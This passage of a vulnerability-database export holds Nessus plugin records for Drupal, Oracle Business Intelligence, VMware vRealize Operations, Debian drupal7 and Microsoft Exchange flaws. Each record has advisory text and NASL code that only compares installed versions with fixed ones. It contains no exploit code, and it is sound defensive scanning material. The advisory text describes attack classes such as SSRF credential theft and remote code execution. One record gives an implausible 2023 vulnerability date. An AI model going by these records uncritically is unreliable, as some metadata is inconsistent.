value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\napp_info = vcf::get_app_info(app:'Drupal', port:port, webapp:TRUE);\n\nconstraints = [\n { 'min_version' : '7.0', 'fixed_version' : '7.74' },\n # Advisory states 8.8 *or earlier*. Interpreting this as 8.x \n { 'min_version' : '8.0', 'fixed_version' : '8.8.11' },\n { 'min_version' : '8.9', 'fixed_version' : '8.9.9' },\n { 'min_version' : '9.0', 'fixed_version' : '9.0.8' }\n];\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T17:46:14", "description": "The version of Oracle Business Intelligence Enterprise Edition (OAS) 5.5.0.0.0 installed on the remote host are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-08T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Enterprise Edition (OAS) (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2023-05-08T00:00:00", "cpe": ["cpe:/a:oracle:business_intelligence"], "id": "ORACLE_OBIEE_CPU_OCT_2020_OAS.NASL", "href": "https://www.tenable.com/plugins/nessus/175282", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175282);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/08\");\n\n script_cve_id(\"CVE-2020-14864\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Oracle Business Intelligence Enterprise Edition (OAS) (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Enterprise Edition (OAS) 5.5.0.0.0 installed on the remote\nhost are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the \nOracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily\nexploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business\nIntelligence Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized access to critical\ndata or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14864\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_analytics_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Analytics Server\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Analytics Server');\n\n# based on Oracle CPU data\nvar constraints = [\n {'min_version': '5.5.0', 'fixed_version': '5.5.0.0.201012', 'fixed_display': '5.5.0.0.201012 patch: 32003790'}\n];\n\nvcf::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:44:34", "description": "The version of Oracle Business Intelligence Enterprise Edition 12.2.1.3 and 12.2.1.4 installed on the remote host are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-02-28T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Enterprise Edition (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2023-03-01T00:00:00", "cpe": ["cpe:/a:oracle:business_intelligence"], "id": "ORACLE_OBIEE_CPU_OCT_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/171961", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(171961);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/01\");\n\n script_cve_id(\"CVE-2020-14864\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Oracle Business Intelligence Enterprise Edition (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Enterprise Edition 12.2.1.3 and 12.2.1.4 installed on the remote\nhost are affected by a vulnerability as referenced in the October 2020 CPU advisory. The vulnerability lies in the \nOracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Easily\nexploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business\nIntelligence Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized access to critical\ndata or complete access to all Oracle Business Intelligence Enterprise Edition accessible data.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14864\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_business_intelligence_enterprise_edition_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Enterprise Edition\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Enterprise Edition');\n\n# based on Oracle CPU data\nvar constraints = [\n {'min_version': '12.2.1.3', 'fixed_version': '12.2.1.3.201020', 'fixed_display': '12.2.1.3.201020 patch: 31690029'},\n {'min_version': '12.2.1.4', 'fixed_version': '12.2.1.4.201020', 'fixed_display': '12.2.1.4.201020 patch: 31690037'}\n];\n\nvcf::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:45", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. 
(CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. 
\n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:45", "description": "Two vulnerabilities were discovered in Drupal, a fully-featured content management framework.\n\nCVE-2020-13666\n\nThe Drupal AJAX API did not disable JSONP by default, which could lead to cross-site scripting.\n\nFor setups that relied on Drupal's AJAX API for JSONP requests, either JSONP will need to be reenabled, or the jQuery AJAX API will have to be used instead.\n\nSee the upstream advisory for more details:\nhttps://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\nDrupal failed to sanitize filenames on uploaded files, which could lead to those files being served as the wrong MIME type, or being executed depending on the server configuration.\n\nIt is also recommended to check previously uploaded files for malicious extensions. 
For more details see the upstream advisory: https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version 7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-11-20T00:00:00", "type": "nessus", "title": "Debian DLA-2458-1 : drupal7 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2458.NASL", "href": "https://www.tenable.com/plugins/nessus/143138", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2458-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143138);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13671\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Debian DLA-2458-1 : drupal7 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Two vulnerabilities were discovered in Drupal, a fully-featured\ncontent management framework.\n\nCVE-2020-13666\n\nThe Drupal AJAX API did not disable JSONP by default, which could lead\nto cross-site scripting.\n\nFor setups that relied on Drupal's AJAX API for JSONP\nrequests, either JSONP will need to be reenabled, or the\njQuery AJAX API will have to be used instead.\n\nSee the upstream advisory for more details:\nhttps://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\nDrupal failed to sanitize filenames on uploaded files, which could\nlead to those files being served as the wrong MIME type, or being\nexecuted depending on the server configuration.\n\nIt is also recommended to check previously uploaded files\nfor malicious extensions. 
For more details see the upstream\nadvisory: https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/11/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13671\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:19", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. 
(CVE-2021-28483, CVE-2021-28482, CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-33766)", "cvss3": {}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (April 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_APR_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/148476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148476);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-28480\",\n \"CVE-2021-28481\",\n \"CVE-2021-28482\",\n \"CVE-2021-28483\",\n \"CVE-2021-33766\",\n \"CVE-2021-34473\",\n \"CVE-2021-34523\"\n );\n script_xref(name:\"MSKB\", value:\"5001779\");\n script_xref(name:\"MSFT\", value:\"MS21-5001779\");\n script_xref(name:\"IAVA\", value:\"2021-A-0160-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0022\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0021\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482,\n CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to\n gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to\n disclose potentially sensitive information. 
(CVE-2021-33766)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bdeeea7\");\n # https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b66291c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5001779\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34473\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-34523\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5001779'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 20,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5001779'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5001779'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:38", "description": "- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013 (CVE-2020-28948 / CVE-2020-28949)\n\n- 
